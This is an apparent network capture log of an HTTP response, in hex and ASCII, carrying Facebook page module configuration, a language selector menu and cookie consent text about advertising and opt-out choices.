                                                                                                                                  2022-10-17 20:07:24 UTC1683INData Raw: 31 65 33 63 0d 0a 65 22 3a 7b 22 72 22 3a 5b 22 76 63 42 63 4a 6a 77 22 2c 22 32 5c 2f 6d 61 51 5c 2f 51 22 2c 22 65 39 41 4e 7a 77 5c 2f 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 5c 2f 6f 35 59 76 4f 32 22 2c 22 68 79 4b 6d 70 75 75 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 54 6f 67 67 6c 65 72 22 3a 7b 22 72 22 3a 5b 22 76 63 42 63 4a 6a 77 22 2c 22 2b 52 47 74 4d 30 6f 22 2c 22 50 4d 45 73 5c 2f 6f 79 22 2c 22 4b 41 6a 62 72 6c 5c 2f 22 2c 22 68 79 4b 6d 70 75 75 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 76 47 74 32 6d 78 7a 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 54 6f 6f 6c 74 69 70 22 3a 7b 22 72 22 3a 5b 22 76 63 42 63 4a 6a 77 22 2c 22 63 68 58 77 50 72 55 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 45 46 31
                                                                                                                                  Data Ascii: 1e3ce":{"r":["vcBcJjw","2\/maQ\/Q","e9ANzw\/","n6W4xMH","vGt2mxz","\/o5YvO2","hyKmpuu"],"be":1},"Toggler":{"r":["vcBcJjw","+RGtM0o","PMEs\/oy","KAjbrl\/","hyKmpuu","lWOvGTa","n6W4xMH","vGt2mxz"],"be":1},"Tooltip":{"r":["vcBcJjw","chXwPrU","R5w1rCJ","EF1
                                                                                                                                  2022-10-17 20:07:24 UTC1685INData Raw: 22 2c 22 75 64 69 74 64 6f 71 22 2c 22 5a 38 7a 36 59 6f 30 22 2c 22 64 5a 76 4c 69 6b 68 22 2c 22 6e 4d 46 57 7a 4c 58 22 2c 22 59 76 33 35 4f 66 32 22 2c 22 48 4e 4a 6c 7a 30 66 22 2c 22 63 59 55 33 63 33 32 22 2c 22 33 4f 67 53 4a 45 34 22 2c 22 73 6a 43 51 65 7a 61 22 2c 22 6f 77 65 73 41 33 50 22 2c 22 55 66 71 36 59 57 58 22 2c 22 41 70 47 35 56 4b 34 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 41 6e 69 6d 61 74 69 6f 6e 22 2c 22 56 69 73 75 61 6c 43 6f 6d 70 6c 65 74 69 6f 6e 47 61 74 69 6e 67 22 2c 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 2c 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 5d 7d 2c 22
                                                                                                                                  Data Ascii: ","uditdoq","Z8z6Yo0","dZvLikh","nMFWzLX","Yv35Of2","HNJlz0f","cYU3c32","3OgSJE4","sjCQeza","owesA3P","Ufq6YWX","ApG5VK4"],"rds":{"m":["Animation","VisualCompletionGating","FbtLogging","IntlQtEventFalcoEvent","BanzaiScuba_DEPRECATED","PageTransitions"]},"
                                                                                                                                  2022-10-17 20:07:24 UTC1686INData Raw: 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 41 73 79 6e 63 44 69 61 6c 6f 67 22 3a 7b 22 72 22 3a 5b 22 76 63 42 63 4a 6a 77 22 2c 22 41 63 6d 5a 31 35 6d 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 5a 45 43 34 52 72 51 22 2c 22 45 46 31 68 57 6c 35 22 2c 22 6c 77 54 35 51 78 77 22 2c 22 52 4d 34 4d 52 34 6e 22 2c 22 2b 52 47 74 4d 30 6f 22 2c 22 41 39 63 69 56 42 39 22 2c 22 58 39 6e 72 36 35 61 22 2c 22 50 4d 45 73 5c 2f 6f 79 22 2c 22 4b 41 6a 62 72 6c 5c 2f 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22 68 79 4b 6d 70 75 75 22 2c 22 6f 5c 2f 75 6e 79 72 6e 22 2c 22 65 4d 6b 4d 78 48 5a 22 2c 22 39 79 6f 4e 79 58 58 22 2c 22 4c 70
                                                                                                                                  Data Ascii: "rds":{"m":["FbtLogging","IntlQtEventFalcoEvent"]},"be":1},"AsyncDialog":{"r":["vcBcJjw","AcmZ15m","R5w1rCJ","ZEC4RrQ","EF1hWl5","lwT5Qxw","RM4MR4n","+RGtM0o","A9ciVB9","X9nr65a","PMEs\/oy","KAjbrl\/","Z2GjVu9","hyKmpuu","o\/unyrn","eMkMxHZ","9yoNyXX","Lp
                                                                                                                                  2022-10-17 20:07:24 UTC1688INData Raw: 6c 63 6f 45 76 65 6e 74 22 2c 22 41 6e 69 6d 61 74 69 6f 6e 22 2c 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 45 78 63 65 70 74 69 6f 6e 44 69 61 6c 6f 67 22 3a 7b 22 72 22 3a 5b 22 5a 36 4b 4e 6e 34 51 22 2c 22 76 63 42 63 4a 6a 77 22 2c 22 41 63 6d 5a 31 35 6d 22 2c 22 5c 2f 48 56 34 42 34 58 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 5a 45 43 34 52 72 51 22 2c 22 45 46 31 68 57 6c 35 22 2c 22 6c 77 54 35 51 78 77 22 2c 22 52 4d 34 4d 52 34 6e 22 2c 22 2b 52 47 74 4d 30 6f 22 2c 22 41 39 63 69 56 42 39 22 2c 22 58 39 6e 72 36 35 61 22 2c 22 50 4d 45 73 5c 2f 6f 79 22 2c 22 4b 41 6a 62 72 6c 5c 2f 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22 68 79
                                                                                                                                  Data Ascii: lcoEvent","Animation","PageTransitions","BanzaiScuba_DEPRECATED"]},"be":1},"ExceptionDialog":{"r":["Z6KNn4Q","vcBcJjw","AcmZ15m","\/HV4B4X","R5w1rCJ","ZEC4RrQ","EF1hWl5","lwT5Qxw","RM4MR4n","+RGtM0o","A9ciVB9","X9nr65a","PMEs\/oy","KAjbrl\/","Z2GjVu9","hy
                                                                                                                                  2022-10-17 20:07:24 UTC1689INData Raw: 6c 5c 2f 22 2c 22 6f 5c 2f 75 6e 79 72 6e 22 2c 22 59 76 33 35 4f 66 32 22 2c 22 73 6a 43 51 65 7a 61 22 2c 22 6f 77 65 73 41 33 50 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 58 55 49 44 69 61 6c 6f 67 46 6f 6f 74 65 72 2e 72 65 61 63 74 22 3a 7b 22 72 22 3a 5b 22 76 63 42 63 4a 6a 77 22 2c 22 5c 2f 48 56 34 42 34 58 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 50 4d 45 73 5c 2f 6f 79 22 2c 22 4b 41 6a 62 72 6c 5c 2f 22 2c 22 68 79 4b 6d 70 75 75 22 2c 22 6f 5c 2f 75 6e 79 72 6e 22 2c 22 75 64 69 74 64 6f 71 22 2c 22 59 76 33 35 4f 66 32 22 2c 22 73 6a 43 51 65 7a 61 22 2c 22 6f 77 65 73 41 33 50 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 58 55 49 44 69 61 6c 6f 67 54 69 74 6c 65 2e 72 65 61 63 74 22 3a 7b 22 72 22 3a 5b 22 76 63 42 63 4a 6a 77 22 2c 22 52 35 77 31 72 43 4a
                                                                                                                                  Data Ascii: l\/","o\/unyrn","Yv35Of2","sjCQeza","owesA3P"],"be":1},"XUIDialogFooter.react":{"r":["vcBcJjw","\/HV4B4X","R5w1rCJ","PMEs\/oy","KAjbrl\/","hyKmpuu","o\/unyrn","uditdoq","Yv35Of2","sjCQeza","owesA3P"],"be":1},"XUIDialogTitle.react":{"r":["vcBcJjw","R5w1rCJ
                                                                                                                                  2022-10-17 20:07:24 UTC1691INData Raw: 69 6e 65 22 3a 5b 5b 22 4c 69 6e 6b 73 68 69 6d 48 61 6e 64 6c 65 72 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 73 75 70 70 6f 72 74 73 5f 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 3a 74 72 75 65 2c 22 64 65 66 61 75 6c 74 5f 6d 65 74 61 5f 72 65 66 65 72 72 65 72 5f 70 6f 6c 69 63 79 22 3a 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 2c 22 73 77 69 74 63 68 65 64 5f 6d 65 74 61 5f 72 65 66 65 72 72 65 72 5f 70 6f 6c 69 63 79 22 3a 22 6f 72 69 67 69 6e 22 2c 22 6e 6f 6e 5f 6c 69 6e 6b 73 68 69 6d 5f 6c 6e 66 62 5f 6d 6f 64 65 22 3a 6e 75 6c 6c 2c 22 6c 69 6e 6b 5f 72 65 61 63 74 5f 64 65 66 61 75 6c 74 5f 68 61 73 68 22 3a 22 41 54 33 78 35 4c 4a 41 42 6f 49 49 4c 34 6d 2d 4c 47 4d 33 4c 62 6e 4b 44 74 0d 0a 31 62 39 65 0d 0a 41
                                                                                                                                  Data Ascii: ine":[["LinkshimHandlerConfig",[],{"supports_meta_referrer":true,"default_meta_referrer_policy":"origin-when-crossorigin","switched_meta_referrer_policy":"origin","non_linkshim_lnfb_mode":null,"link_react_default_hash":"AT3x5LJABoIIL4m-LGM3LbnKDt1b9eA
                                                                                                                                  2022-10-17 20:07:24 UTC1692INData Raw: 5f 52 78 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 39 5f 30 78 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 61 5f 79 47 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 62 5f 61 30 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 63 5f 4b 57 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 64 5f 32 59 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 65 5f 44 56 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 66 5f 4f 34 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 67 5f 57 64 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 68 5f 69 4d 22 2c 22 5f 5f 6d 61 72 6b
                                                                                                                                  Data Ascii: _Rx","__markup_3310c079_0_9_0x","__markup_3310c079_0_a_yG","__markup_3310c079_0_b_a0","__markup_3310c079_0_c_KW","__markup_3310c079_0_d_2Y","__markup_3310c079_0_e_DV","__markup_3310c079_0_f_O4","__markup_3310c079_0_g_Wd","__markup_3310c079_0_h_iM","__mark
                                                                                                                                  2022-10-17 20:07:24 UTC1694INData Raw: 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 34 5f 57 69 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 45 6e 67 6c 69 73 68 20 28 55 53 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 65 73 5f 4c 41 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33
                                                                                                                                  Data Ascii: r":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_4_Wi"},"label":"English (US)","title":"","className":"headerItem"},{"class":"headerItem","value":"es_LA","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_33
                                                                                                                                  2022-10-17 20:07:24 UTC1695INData Raw: 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 70 6c 5f 50 4c 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 63 5f 4b 57 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 50 6f 6c 73 6b 69 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 70 74 5f 42 52 22 2c 22 73 65 6c 65 63 74 65
                                                                                                                                  Data Ascii: Name":"headerItem"},{"class":"headerItem","value":"pl_PL","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_c_KW"},"label":"Polski","title":"","className":"headerItem"},{"class":"headerItem","value":"pt_BR","selecte
                                                                                                                                  2022-10-17 20:07:24 UTC1696INData Raw: 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6a 5f 6c 58 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 54 5c 75 30 30 66 63 72 6b 5c 75 30 30 65 37 65 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 63 73 5f 43 5a 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6b 5f 62 51 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 31 30 63 65 5c 75
                                                                                                                                  Data Ascii: p":{"__m":"__markup_3310c079_0_j_lX"},"label":"T\u00fcrk\u00e7e","title":"","className":"headerItem"},{"class":"headerItem","value":"cs_CZ","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_k_bQ"},"label":"\u010ce\u
                                                                                                                                  2022-10-17 20:07:24 UTC1698INData Raw: 32 39 66 30 0d 0a 70 5f 45 39 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 39 33 39 5c 75 30 39 33 66 5c 75 30 39 32 38 5c 75 30 39 34 64 5c 75 30 39 32 36 5c 75 30 39 34 30 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 74 68 5f 54 48 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 71 5f 4d 48 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 65 32 30 5c 75 30 65 33 32 5c 75
                                                                                                                                  Data Ascii: 29f0p_E9"},"label":"\u0939\u093f\u0928\u094d\u0926\u0940","title":"","className":"headerItem"},{"class":"headerItem","value":"th_TH","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_q_MH"},"label":"\u0e20\u0e32\u
                                                                                                                                  2022-10-17 20:07:24 UTC1699INData Raw: 64 31 65 35 36 35 5f 30 5f 30 5f 50 68 22 2c 5b 22 44 69 61 6c 6f 67 58 22 2c 22 4c 61 79 65 72 46 61 64 65 4f 6e 48 69 64 65 22 2c 22 44 69 61 6c 6f 67 48 69 64 65 4f 6e 53 75 63 63 65 73 73 22 2c 22 4c 61 79 65 72 48 69 64 65 4f 6e 54 72 61 6e 73 69 74 69 6f 6e 22 2c 22 4c 61 79 65 72 52 65 6d 6f 76 65 4f 6e 48 69 64 65 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 76 48 22 2c 22 48 54 4d 4c 22 5d 2c 5b 7b 22 77 69 64 74 68 22 3a 36 38 30 2c 22 61 75 74 6f 68 69 64 65 22 3a 6e 75 6c 6c 2c 22 74 69 74 6c 65 49 44 22 3a 6e 75 6c 6c 2c 22 72 65 64 69 72 65 63 74 55 52 49 22 3a 6e 75 6c 6c 2c 22 66 69 78 65 64 54 6f 70 50 6f 73 69 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 69 67 6e 6f 72 65 46 69 78 65 64 54 6f 70 49 6e 53 68 6f 72 74
                                                                                                                                  Data Ascii: d1e565_0_0_Ph",["DialogX","LayerFadeOnHide","DialogHideOnSuccess","LayerHideOnTransition","LayerRemoveOnHide","__markup_9f5fac15_0_0_vH","HTML"],[{"width":680,"autohide":null,"titleID":null,"redirectURI":null,"fixedTopPosition":null,"ignoreFixedTopInShort
                                                                                                                                  2022-10-17 20:07:24 UTC1701INData Raw: 20 73 78 5f 35 37 37 63 36 30 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 36 61 20 75 69 50 6f 70 6f 76 65 72 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 37 5f 5a 47 5c 22 3e 5c 75 30 30 33 43 61 20 72 6f 6c 65 3d 5c 22 62 75 74 74 6f 6e 5c 22 20 63 6c 61 73 73 3d 5c 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 35 35 70 69 20 5f 32 61 67 66 20 5f 34 6f 5f 34 20 5f 39 6f 2d 65 20 5f 70 20 5f 34 6a 79 33 20 5f 35 31 37 68 20 5f 35 31 73 79 5c 22 20 68 72 65 66 3d 5c 22 23 5c 22 20 73 74 79 6c 65 3d 5c 22 6d 61 78 2d 77 69 64 74 68 3a 32 30 30 70 78 3b 5c 22 20 61 72 69 61 2d 68 61 73 70 6f 70 75 70 3d 5c 22 74 72 75 65 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 5c 22 66 61 6c 73 65 5c 22 20 72 65 6c 3d 5c 22
                                                                                                                                  Data Ascii: sx_577c60\">\u003C\/i>\u003Cdiv class=\"_6a uiPopover\" id=\"u_0_7_ZG\">\u003Ca role=\"button\" class=\"_42ft _4jy0 _55pi _2agf _4o_4 _9o-e _p _4jy3 _517h _51sy\" href=\"#\" style=\"max-width:200px;\" aria-haspopup=\"true\" aria-expanded=\"false\" rel=\"
                                                                                                                                  2022-10-17 20:07:24 UTC1702INData Raw: 6f 6f 6b 20 50 72 6f 64 75 63 74 73 2c 20 61 6e 61 6c 79 74 69 63 73 2c 20 61 6e 64 20 74 6f 20 70 72 6f 76 69 64 65 20 63 65 72 74 61 69 6e 20 66 65 61 74 75 72 65 73 20 61 6e 64 20 69 6d 70 72 6f 76 65 20 6f 75 72 20 73 65 72 76 69 63 65 73 20 66 6f 72 20 79 6f 75 2c 20 77 65 20 75 73 65 20 74 6f 6f 6c 73 20 66 72 6f 6d 20 6f 74 68 65 72 20 63 6f 6d 70 61 6e 69 65 73 20 6f 6e 20 46 61 63 65 62 6f 6f 6b 2e 20 54 68 65 73 65 20 63 6f 6d 70 61 6e 69 65 73 20 61 6c 73 6f 20 75 73 65 20 63 6f 6f 6b 69 65 73 2e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 33 5c 22 3e 59 6f 75 20 63 61 6e 20 61 6c 6c 6f 77 20 74 68 65 20 75 73 65 20 6f 66 20 61 6c 6c 20 63 6f 6f 6b 69 65 73 2c 20 6a 75 73 74 20 65 73 73
                                                                                                                                  Data Ascii: ook Products, analytics, and to provide certain features and improve our services for you, we use tools from other companies on Facebook. These companies also use cookies.\u003C\/div>\u003Cdiv class=\"_9xo3\">You can allow the use of all cookies, just ess
                                                                                                                                  2022-10-17 20:07:24 UTC1704INData Raw: 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 76 74 67 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 39 5f 69 47 5c 22 3e 5c 75 30 30 33 43 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 64 20 5f 39 6e 67 65 5c 22 20 74 69 74 6c 65 3d 5c 22 65 78 70 61 6e 64 61 62 6c 65 20 73 65 63 74 69 6f 6e 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 63 5c 22 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 66 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6c 5c 22 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 67 20 5f 39 76 37 76 5c 22 3e 5c 75
                                                                                                                                  Data Ascii: div class=\"_9vtg\" id=\"u_0_9_iG\">\u003Cbutton class=\"_9ngd _9nge\" title=\"expandable section\">\u003Cdiv class=\"_9ngc\">\u003Cspan class=\"_9ngf\">\u003Cdiv class=\"_9o-l\">More information\u003C\/div>\u003C\/span>\u003Cspan class=\"_9ngg _9v7v\">\u
                                                                                                                                  2022-10-17 20:07:24 UTC1705INData Raw: 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6b 5c 22 3e 4f 74 68 65 72 20 77 61 79 73 20 79 6f 75 20 63 61 6e 20 63 6f 6e 74 72 6f 6c 20 79 6f 75 72 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 76 74 67 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 61 5f 5c 2f 6a 5c 22 3e 5c 75 30 30 33 43 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 64 20 5f 39 6e 67 65 5c 22 20 74 69 74 6c 65 3d 5c 22 65 78 70 61 6e 64 61 62 6c 65 20 73 65 63 74 69 6f 6e 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 63 5c 22 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 66 5c 22 3e 5c 75 30 30 33
                                                                                                                                  Data Ascii: lass=\"_9o-k\">Other ways you can control your information\u003C\/p>\u003C\/div>\u003Cdiv>\u003Cdiv class=\"_9vtg\" id=\"u_0_a_\/j\">\u003Cbutton class=\"_9ngd _9nge\" title=\"expandable section\">\u003Cdiv class=\"_9ngc\">\u003Cspan class=\"_9ngf\">\u003
                                                                                                                                  2022-10-17 20:07:24 UTC1707INData Raw: 20 73 65 74 74 69 6e 67 73 5c 75 30 30 33 43 5c 2f 61 3e 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 73 69 2d 5c 22 3e 41 64 20 70 72 65 66 65 72 65 6e 63 65 73 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 59 6f 75 20 63 61 6e 20 75 73 65 20 79 6f 75 72 20 61 64 20 70 72 65 66 65 72 65 6e 63 65 73 20 74 6f 20 6c 65 61 72 6e 20 77 68 79 20 79 6f 75 26 23 30 33 39 3b 72 65 20 73 65 65 69 6e 67 20 61 20 70 61 72 74 69 63 75 6c 61 72 20 61 64 20 61 6e 64 20 63 6f 6e 74 72 6f 6c 20 68 6f 77 20 77 65 20 75 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 68 61 74 20 77 65 20 63 6f 6c 6c 65 63 74 20 74 6f 20 73 68 6f 77 20 79 6f 75 20 61 64 73 2e 5c 75 30 30 33 43
                                                                                                                                  Data Ascii: settings\u003C\/a>.\u003C\/p>\u003Cp class=\"_9si-\">Ad preferences\u003C\/p>\u003Cp class=\"_9o-m\">You can use your ad preferences to learn why you&#039;re seeing a particular ad and control how we use information that we collect to show you ads.\u003C
                                                                                                                                  2022-10-17 20:07:24 UTC1708INData Raw: 65 69 6e 67 20 6f 6e 6c 69 6e 65 20 69 6e 74 65 72 65 73 74 2d 62 61 73 65 64 20 61 64 73 20 66 72 6f 6d 20 46 61 63 65 62 6f 6f 6b 20 61 6e 64 20 6f 74 68 65 72 20 70 61 72 74 69 63 69 70 61 74 69 6e 67 20 63 6f 6d 70 61 6e 69 65 73 20 74 68 72 6f 75 67 68 20 74 68 65 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 6f 70 74 6f 75 74 2e 61 62 6f 75 74 61 64 73 2e 69 6e 66 6f 5c 75 30 30 32 35 32 46 26 61 6d 70 3b 68 3d 41 54 32 5f 63 36 4e 36 77 36 50 53 41 74 6e 4f 6f 70 50 44 36 65 44 63 70 43 50 50 48 35 47 43 79 47 32 35 31 34 0d 0a
                                                                                                                                  Data Ascii: eing online interest-based ads from Facebook and other participating companies through the \u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Foptout.aboutads.info\u00252F&amp;h=AT2_c6N6w6PSAtnOopPD6eDcpCPPH5GCyG2514
                                                                                                                                  2022-10-17 20:07:24 UTC1708INData Raw: 33 33 36 62 0d 0a 6a 51 66 75 4a 35 78 63 6c 47 4a 41 37 4b 42 31 44 31 54 64 57 33 45 75 50 70 54 6d 6b 6e 66 35 49 33 4a 30 64 34 62 56 46 34 48 67 49 6a 4b 2d 5f 6a 41 37 61 67 49 77 48 58 69 59 32 52 49 75 54 52 33 73 59 73 64 5f 50 37 70 64 48 71 73 48 4b 61 76 4c 48 50 77 79 57 53 64 6c 4c 72 55 4f 73 6c 6d 37 50 35 45 76 64 5f 51 63 35 64 6e 77 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 44 69 67 69 74 61 6c 20 41 64 76 65 72 74 69 73 69 6e 67 20 41 6c 6c 69 61 6e 63 65 5c 75 30 30 33 43 5c 2f 61 3e 20 69 6e 20 74 68 65 20 55 53 2c 20 74 68 65 20 5c 75 30 30 33 43 61
